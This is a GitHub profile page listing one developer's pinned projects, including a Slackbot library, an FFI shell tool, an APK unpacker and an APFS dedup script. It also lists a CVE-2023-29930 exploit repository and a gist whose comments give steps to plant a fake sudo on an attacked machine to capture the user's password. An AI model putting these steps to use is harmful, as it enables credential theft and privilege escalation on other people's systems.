Skip to content
View YSaxon's full-sized avatar
Block or Report

Block or report YSaxon

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. boltworks boltworks Public

    Easier more interesting Slackbots

    Python 1

  2. cliffi cliffi Public

    cliFFI: call native shared library functions right from your shell

    C 1

  3. legu_unpacker_2023 legu_unpacker_2023 Public

    Forked from quarkslab/legu_unpacker_2019

    Scripts to unpack APK protected by Legu

    Python 7 3

  4. TFTPlunder TFTPlunder Public

    Info and exploit for CVE-2023-29930: blind file read/write in Genesys TFTP provisioning server configuration

    Python 1

  5. Shell script to deduplicate in a dir... Shell script to deduplicate in a directory with MacOS APFS cow copies using rdfind
    1
    #!/bin/zsh
    2
    
                  
    3
    # Optionally use apfs-clonechecker to check for clones before recloning, useful if you are rerunning the script
    4
    export do_clone_check=${do_clone_check:-1}
    5
    export cleanup=${cleanup:-1}
  6. bash sudo spoofer, to obtain a users... bash sudo spoofer, to obtain a users password if you have RCE but need their password to sudo
    1
    #step 1: generate an rsa public/private keypair, and write your public key into the script below
    2
    #step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
    3
    #step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
    4
    #note that you could easily modify to spoof other password taking utils like sudosh or su
    5